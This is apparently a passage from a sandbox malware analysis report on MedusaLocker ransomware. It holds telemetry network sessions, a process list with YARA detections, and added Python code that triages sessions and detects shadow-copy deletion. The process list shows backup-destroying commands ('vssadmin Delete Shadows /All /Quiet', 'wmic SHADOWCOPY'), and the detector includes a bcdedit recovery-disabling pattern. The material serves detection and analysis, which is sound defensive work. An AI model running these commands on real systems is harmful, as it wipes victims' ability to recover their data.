                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 75003
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:46:25 UTC | 356 | OUT | Data Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 39 61 63 31 39 61 30 30 31 33 32 37 34 62 63 39 61 34 35 32 30 32 31 30 65 61 31 35 66 30 36 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>9ac19a0013274bc9a4520210ea15f063</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:46:25 UTC | 372 | OUT | Data Raw: 37 62 39 61 64 38 63 30 33 66 61 30 65 63 31 30 31 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 77 74 22 3a 7b 22 47 51 48 5f 53 22 3a 31 31 2c 22 47 51 48 5f 50 22 3a 31 31 2c 22 47 51 48 5f 43 22 3a 38 38 2c 22 53 57 56 53 22 3a 36 30 30 2c 22 53 57 56 50 22 3a 36 30 30 2c 22 53 57 56 43 22
                                    Data Ascii: 7b9ad8c03fa0ec101</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","wt":{"GQH_S":11,"GQH_P":11,"GQH_C":88,"SWVS":600,"SWVP":600,"SWVC"
                                    2023-01-25 18:46:25 UTC | 388 | OUT | Data Raw: 2f 30 2f 31 2f 31 2f 66 2f 76 69 73 69 62 6c 65 2f 64 65 66 61 75 6c 74 22 2c 22 4c 22 3a 22 34 72 2f 30 2f 44 49 56 23 64 69 61 6c 6f 67 42 6f 78 57 72 61 70 70 65 72 2f 2f 38 2f 38 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 31 2f 50 52 4f 47 52 45 53 53 23 62 5f 70 72 6f 67 72 65 73 73 2f 2f 30 2f 30 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 32 2f 44 49 56 23 63 6f 72 74 61 6e 61 48 6f 6d 65 2f 2f 30 2f 30 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 33 2f 44 49 56 2e 73 63 72 2f 2f 38 2f 38 2f 30 2f 31 2f 32 2f 54 2f 2d 31 22 2c 22 4e 22 3a 22 2d 31 2f 30 2f 2f 40 30 2f 56 32 25 32 46 64 6f 63 75 6d 65 6e 74 2f 2f 38 64 2f 40 31 2f 6e 2f 2d 31 2f 6e 2f 73 2f 73 2f 73 2b 31 35 2f 31 2f 2f 40 30 2f 42 6c 75 65 42 72 61 6e 64 2f 40 32 2f 32 2f 40 31
                                    Data Ascii: /0/1/1/f/visible/default","L":"4r/0/DIV#dialogBoxWrapper//8/8/0/0/2/T/-1+4r/1/PROGRESS#b_progress//0/0/0/0/2/T/-1+4r/2/DIV#cortanaHome//0/0/0/0/2/T/-1+4r/3/DIV.scr//8/8/0/1/2/T/-1","N":"-1/0//@0/V2%2Fdocument//8d/@1/n/-1/n/s/s/s+15/1//@0/BlueBrand/@2/2/@1
                                    2023-01-25 18:46:25 UTC | 404 | OUT | Data Raw: 34 2e 38 30 31 32 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 37 22 3a 31 32 35 2c 22 38 22 3a 31 2c 22 31 30 22 3a 32 2c 22 31 36 22 3a 31 32 35 2c 22 31 39 22 3a 31 2c 22 34 32 22 3a 31 2c 22 36 34 22 3a 31 2c 22 31 32 31 22 3a 31 2c 22 31 33 34 22 3a 33 34 2c 22 31 33 35 22 3a 38 2e 35 2c 22 31 33 37 22 3a 33 36 2c 22 32 36 34 22 3a 31 2c 22 32 36 36 22 3a 31 2c 22 32 36 37 22 3a 31 2c 22 32 38 31 22 3a 31 2c 22 32 38 32 22 3a 31 2c 22 32 38 34 22 3a 33 34 2c 22 32 39 36 22 3a 31 7d 2c 22 66 62 63 53 63 6f 72 65 22 3a 30 2e 39 33 34 31 31 7d 7d 5d 7d 2c 7b 22 54 22 3a 22 44 2e 43 6f 6e 74 65 6e 74 47 72 6f 75 70 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67
                                    Data Ascii: 4.80126,"featureStore":{"7":125,"8":1,"10":2,"16":125,"19":1,"42":1,"64":1,"121":1,"134":34,"135":8.5,"137":36,"264":1,"266":1,"267":1,"281":1,"282":1,"284":34,"296":1},"fbcScore":0.93411}}]},{"T":"D.ContentGroup","AppNS":"SmartSearch","Service":"AutoSugg
                                    2023-01-25 18:46:25 UTC | 420 | OUT | Data Raw: 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 30 30 32 2c 22 51 22 3a 22 57 69 6e 64 6f 77 73 20 55 70 64 61 74 65 20 73 65 74 74 69 6e 67 73 22 2c 22 4d 51 22 3a 22 75 70 64 61 74 65 73 22 2c 22 56 61 6c 22 3a 22 53 54 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 31 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 37 30 34 35 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 41 41 41 5f 53 65 74 74 69 6e 67 73 50 61 67 65 52 65 73 74 6f 72 65 4d 75 73 55 70 64 61 74 65 22 2c 22 44 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 20 55 70 64 61 74 65 20 73 65 74 74 69 6e 67 73 22 2c 22 4d 44 4e 22 3a 31 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67
                                    Data Ascii: ":"D.Url","K":1002,"Q":"Windows Update settings","MQ":"updates","Val":"ST","Ho":2,"Gr":1,"DeviceSignals":{"Rank":7045,"PHits":"System.ParsingName","Id":"AAA_SettingsPageRestoreMusUpdate","DName":"Windows Update settings","MDN":1},"RankerSignals":{"ranking
                                    2023-01-25 18:46:25 UTC | 430 | IN | HTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: AC6482D6ECBD4769B5039392C85E7EA3 Ref B: FRA31EDGE0622 Ref C: 2023-01-25T18:46:25Z
                                    Date: Wed, 25 Jan 2023 18:46:24 GMT
                                    Connection: close
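
                                    The session listing above is rendered one message per line: timestamp, the session's cumulative kByte counter, direction and data, and in the raw export the four columns are run together without separators. By its headers (Host: www.bing.com, a User-Agent and X-Search-AppId naming Cortana) this session is Windows search telemetry that the analysis VM emits on its own, and a triager reading the network section wants that separated from sessions that deserve a closer look. The Python below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses this rendering, summarises a session and classifies it against a small allowlist. The allowlist, the function names and the second, constructed session to 198.51.100.7 are assumptions of the example; the report excerpt has its body hex shortened.

```python
import re

# One message per line: timestamp, cumulative kByte counter, direction, data.
# The raw export runs the columns together ("UTC354OUTPOST /..."), so the
# direction keyword is the anchor; an optional " | " separator is tolerated.
MESSAGE_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2} UTC)\s*\|?\s*"
    r"(?P<kbytes>\d+)\s*\|?\s*(?P<direction>IN|OUT)\s*\|?\s*(?P<data>.*)$"
)
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")
STATUS_LINE = re.compile(r"^HTTP/\d\.\d (?P<status>\d{3})")

# Assumed allowlist for this example: Windows search/Cortana telemetry that a
# sandbox VM emits by itself. Build yours from your own baseline, not from here.
TELEMETRY_HOSTS = {"www.bing.com"}
TELEMETRY_UA_MARKERS = ("Cortana",)


def parse_session(text):
    """Split a session listing into messages. Each starts at a timestamped
    line; the lines that follow are headers or a 'Data Ascii:' body preview."""
    messages = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MESSAGE_LINE.match(line)
        if m:
            messages.append({"ts": m["ts"], "kbytes": int(m["kbytes"]),
                             "direction": m["direction"], "first_line": m["data"],
                             "headers": {}, "body_preview": None})
        elif messages and line.startswith("Data Ascii:"):
            messages[-1]["body_preview"] = line[len("Data Ascii:"):].strip()
        elif messages and ": " in line:
            name, value = line.split(": ", 1)
            messages[-1]["headers"][name.lower()] = value
    return messages


def summarize(messages):
    """What a triager needs per session: every request's method, path, host and
    User-Agent, every response status, and the session's final byte counter."""
    requests, responses = [], []
    for msg in messages:
        req = REQUEST_LINE.match(msg["first_line"])
        if req and msg["direction"] == "OUT":
            requests.append({"method": req["method"], "path": req["path"],
                             "host": msg["headers"].get("host"),
                             "user_agent": msg["headers"].get("user-agent", ""),
                             "content_length": int(msg["headers"].get("content-length", 0))})
            continue
        status = STATUS_LINE.match(msg["first_line"])
        if status and msg["direction"] == "IN":
            responses.append(int(status["status"]))
    return {"requests": requests, "responses": responses,
            "kbytes_total": max((m["kbytes"] for m in messages), default=0)}


def classify_session(summary):
    """'telemetry' only when every request goes to an allowlisted host with a
    telemetry User-Agent. Anything else, including a session with no parsable
    request at all (where a custom C2 protocol would land), is 'review'."""
    requests = summary["requests"]
    if not requests:
        return "review"
    for r in requests:
        if r["host"] not in TELEMETRY_HOSTS:
            return "review"
        if not any(marker in r["user_agent"] for marker in TELEMETRY_UA_MARKERS):
            return "review"
    return "telemetry"


def triage(text):
    summary = summarize(parse_session(text))
    return summary, classify_session(summary)


# Excerpt of session 6 from the listing above (body hex shortened).
SAMPLE_SESSION = """
2023-01-25 18:46:25 UTC354OUTPOST /threshold/xls.aspx HTTP/1.1
Origin: https://www.bing.com
Content-type: text/xml
X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
Host: www.bing.com
Content-Length: 75003
Connection: Keep-Alive
2023-01-25 18:46:25 UTC356OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e
Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID>
2023-01-25 18:46:25 UTC430INHTTP/1.1 204 No Content
Access-Control-Allow-Origin: *
Date: Wed, 25 Jan 2023 18:46:24 GMT
Connection: close
"""

# Constructed second session (not from the report): unknown host, stock UA.
CONSTRUCTED_UNKNOWN_SESSION = """
2023-01-25 18:47:01 UTC1OUTPOST /api/v1/sync HTTP/1.1
Host: 198.51.100.7
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 64
2023-01-25 18:47:02 UTC2INHTTP/1.1 200 OK
Content-Length: 2
Connection: close
"""

if __name__ == "__main__":
    for label, text in (("report excerpt", SAMPLE_SESSION),
                        ("constructed", CONSTRUCTED_UNKNOWN_SESSION)):
        summary, verdict = triage(text)
        print(label, verdict, summary["requests"], summary["responses"])
```

                                    A session is only called telemetry when every request in it passes both checks, so a single beacon multiplexed into an otherwise benign session still surfaces as review; the allowlist should stay short and come from your own sandbox baseline.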


                                    Target ID:0
                                    Start time:19:45:03
                                    Start date:25/01/2023
                                    Path:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Imagebase:0x9d0000
                                    File size:685568 bytes
                                    MD5 hash:646698572AFBBF24F50EC5681FEB2DB7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.246642887.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    Target ID:1
                                    Start time:19:45:04
                                    Start date:25/01/2023
                                    Path:C:\Users\user\AppData\Roaming\svhost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\svhost.exe
                                    Imagebase:0xe50000
                                    File size:685568 bytes
                                    MD5 hash:646698572AFBBF24F50EC5681FEB2DB7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.249765327.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekSHen
                                    • Rule: MALWARE_Win_MedusaLocker, Description: Detects MedusaLocker ransomware, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekshen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 90%, ReversingLabs
                                    Reputation:low

                                    Target ID:4
                                    Start time:19:45:08
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:5
                                    Start time:19:45:08
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:7
                                    Start time:19:45:09
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:8
                                    Start time:19:45:09
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:9
                                    Start time:19:45:10
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    Target ID:10
                                    Start time:19:45:10
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:11
                                    Start time:19:45:11
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:12
                                    Start time:19:45:11
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Target ID:13
                                    Start time:19:45:12
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:14
                                    Start time:19:45:12
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:15
                                    Start time:19:45:13
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Target ID:16
                                    Start time:19:45:13
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
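
                                    The process list above shows vssadmin.exe Delete Shadows /All /Quiet and wmic.exe SHADOWCOPY /nointeractive each started three times within about five seconds, all with elevated privileges, which is the observable a detection engineer wants to catch rather than the file hash. The Python below is an added example, not from the report or from Joe Security: detection logic run over constructed process-creation events built from the process list. The Sysmon-style field names, the parent image (this view does not print the parent, so the dropped C:\Users\user\AppData\Roaming\svhost.exe copy is assumed), the benign control event and the severity scheme are assumptions of the example; the bcdedit pattern corresponds to the signature "May use bcdedit to modify the Windows boot settings" and no bcdedit process was observed in this run.

```python
import re
from datetime import datetime, timedelta

# Command-line patterns for the two shadow-copy commands in the process list
# (vssadmin, wmic) plus the bcdedit boot-tampering command the signature list
# warns about. bcdedit was not observed in this run; the pattern is included
# because ransomware usually runs it alongside the shadow-copy purge.
SHADOW_DELETE_PATTERNS = {
    "vssadmin_delete_shadows": re.compile(
        r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I),
    "wmic_shadowcopy": re.compile(
        r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b", re.I),
    "bcdedit_recovery_off": re.compile(
        r"\bbcdedit(?:\.exe)?\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
        re.I),
}

# A parent image under a user-writable path is the ransomware shape of this
# activity; backup agents and admins launch vssadmin from system paths.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def classify(event):
    """Return the name of the first matching pattern for one event, or None."""
    for name, pattern in SHADOW_DELETE_PATTERNS.items():
        if pattern.search(event["cmdline"]):
            return name
    return None


def detect_shadow_copy_deletion(events, window=timedelta(seconds=60), repeat_threshold=3):
    """One alert per matching event. Severity is medium by default, high when
    the parent lives in a user-writable directory, and critical once the same
    parent has produced `repeat_threshold` hits inside `window` (the sample
    fires vssadmin and wmic three times each within a few seconds)."""
    alerts = []
    hits_by_parent = {}
    for event in sorted(events, key=lambda e: e["ts"]):
        rule = classify(event)
        if rule is None:
            continue
        ts = datetime.strptime(event["ts"], "%Y-%m-%d %H:%M:%S")
        parent = event["parent_image"].lower()
        recent = [t for t in hits_by_parent.get(parent, []) if ts - t <= window]
        recent.append(ts)
        hits_by_parent[parent] = recent
        severity = "medium"
        if parent.startswith(USER_WRITABLE_PREFIXES):
            severity = "high"
        if len(recent) >= repeat_threshold:
            severity = "critical"
        alerts.append({"ts": event["ts"], "rule": rule, "severity": severity,
                       "parent_image": event["parent_image"],
                       "cmdline": event["cmdline"],
                       "repeats_in_window": len(recent)})
    return alerts


# Constructed process-creation events (Sysmon Event ID 1 style field names are
# an assumption). Images, command lines and start times come from the process
# list; the parent image is assumed to be the dropped svhost.exe copy.
_RANSOMWARE_PARENT = "C:\\Users\\user\\AppData\\Roaming\\svhost.exe"
SAMPLE_EVENTS = [
    {"ts": "2023-01-25 19:45:%02d" % sec, "image": "C:\\Windows\\SysWOW64\\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet", "parent_image": _RANSOMWARE_PARENT}
    for sec in (8, 10, 12)
] + [
    {"ts": "2023-01-25 19:45:%02d" % sec, "image": "C:\\Windows\\SysWOW64\\wbem\\WMIC.exe",
     "cmdline": "wmic.exe SHADOWCOPY /nointeractive", "parent_image": _RANSOMWARE_PARENT}
    for sec in (9, 11, 13)
] + [
    # conhost noise that accompanies each console tool in the list.
    {"ts": "2023-01-25 19:45:08", "image": "C:\\Windows\\System32\\conhost.exe",
     "cmdline": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1",
     "parent_image": "C:\\Windows\\SysWOW64\\vssadmin.exe"},
    # Benign look-alike: an admin listing shadows from an elevated prompt.
    {"ts": "2023-01-25 19:50:00", "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin list shadows", "parent_image": "C:\\Windows\\System32\\cmd.exe"},
]


def run_sample():
    return detect_shadow_copy_deletion(SAMPLE_EVENTS)


if __name__ == "__main__":
    for alert in run_sample():
        print(alert["ts"], alert["severity"], alert["rule"], alert["repeats_in_window"])
```

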